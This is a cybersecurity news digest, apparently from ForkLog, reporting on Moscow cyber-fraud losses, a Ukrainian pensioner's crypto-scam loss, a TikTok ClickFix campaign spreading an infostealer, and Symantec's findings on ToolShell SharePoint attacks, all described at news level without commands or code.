A digest of the week’s most important cybersecurity news.
- Cybercriminals stole 450 million rubles from a Moscow resident.
- A pensioner from Ternopil tried crypto investing and lost his savings.
- Cybercriminals used TikTok videos to spread malware.
- A Symantec report revealed details of large-scale attacks on the infrastructure of many countries.
Cybercriminals stole 450 million rubles from a Moscow resident
Cybercrime losses in Moscow reached 34 billion rubles in the first six months of 2025, according to an interview with Interfax given by Police Colonel Anton Kononenko, head of the UBK of the Ministry of Internal Affairs for the capital.
“Crimes are now being committed for one million rubles and above; there are almost no minor ones left. Compared with previous years, the amount of damage from the actions of cyber fraudsters in the capital is tending to grow,” Kononenko commented.
According to law enforcement, in the spring cybercriminals set a record by stealing 450 million rubles.
Kononenko said losses have been increasing over the past three years. If previously most theft investigations involved sums up to 50,000 rubles, now around 80% of detected crimes fall into the categories of serious (damage from 250,000 rubles) and especially serious.
A Ternopil pensioner tried crypto investing and lost his savings
A 64-year-old resident of Ternopil fell victim to fraudsters, losing about 1 million hryvnias, the press service of the Ternopil District Police Department reports.
According to police, the victim saw a social media advertisement for investment courses and promises of earnings. He followed a link and contacted a person who introduced himself as a broker-analyst.
After registering on the site, the pensioner began transferring money from his e-wallet to the specified account. When the total reached $28,100, the “broker” stopped responding and access to the platform was blocked.
Cybercriminals used TikTok videos to distribute malware
On 17 October, ISC Handler analyst Xavier Mertens noted an ongoing campaign using TikTok videos for hacking.
Infostealing malware is disguised as free guides to activate popular programmes such as Windows, Spotify and Netflix.
The videos use a ClickFix social-engineering technique, in which attackers present supposedly legitimate “solutions” or instructions.
In fact, victims are induced to run malicious PowerShell commands or other scripts that infect their computers.
Each video shows a short one-line command and urges viewers to run it as administrator in PowerShell.
Once launched, the malware connects to a remote site and fetches another script, which downloads and installs two executables from Cloudflare Pages. The first is a variant of Aura Stealer—malware that steals:
- passwords saved in the browser;
- authentication cookies;
- cryptocurrency wallet data;
- credentials from other applications.
All collected data is sent to the attackers, giving them access to the victim’s accounts.
Mertens added that another file, source.exe, is also downloaded; it uses the built-in Visual C# Compiler to self-assemble code, which then runs in memory. The aim of the second module remains unknown.
Symantec report details large-scale attacks on the infrastructure of many countries
Hackers linked to China used the ToolShell vulnerability in Microsoft SharePoint to attack government departments, universities, telecom providers and financial organisations, according to a Symantec report.
The flaw affects on-premises SharePoint servers. It became known in July after large-scale attacks by Chinese hackers. The malware can be exploited remotely without authentication to execute code and gain full access to the file system.
During the campaign, the attackers used malware typically associated with the Chinese hacking group Salt Typhoon.
According to Symantec, ToolShell was used to compromise organisations in the Middle East, South America, the United States and Africa. The attacks hit:
- a telecom provider in the Middle East;
- two government departments in an unnamed African country;
- two government agencies in South America;
- a university in the United States;
- a government technology agency in Africa;
- a government department in the Middle East;
- a European financial company.
Notably, the attack was executed through legitimate executables from Trend Micro and BitDefender. For the South American scheme, the attackers used a file with a name resembling Symantec.
Researchers noted the use of publicly available tools including Microsoft’s certutil utility, the GoGo Scanner tool and Revsocks, which enables data exfiltration via a remote server.
Also on ForkLog:
- Meteora’s co-founder was accused of ties to the MELANIA and LIBRA scam.
- Myanmar’s military raided the KK Park scam centre.
- DEX Bunni shut down after an $8.4m hack.
- Hackers moved 15,959 BTC from LuBian addresses.
- ZachXBT uncovered a scheme to steal $3m in XRP from an American’s wallet.
What to read this weekend?
The P2P segment in Russia has turned into a laundromat for dirty money, a breeding ground for grey schemes and a haven for fraudsters. As usual, ordinary users are the ones who suffer. In a new piece, ForkLog examines where the segment went off course.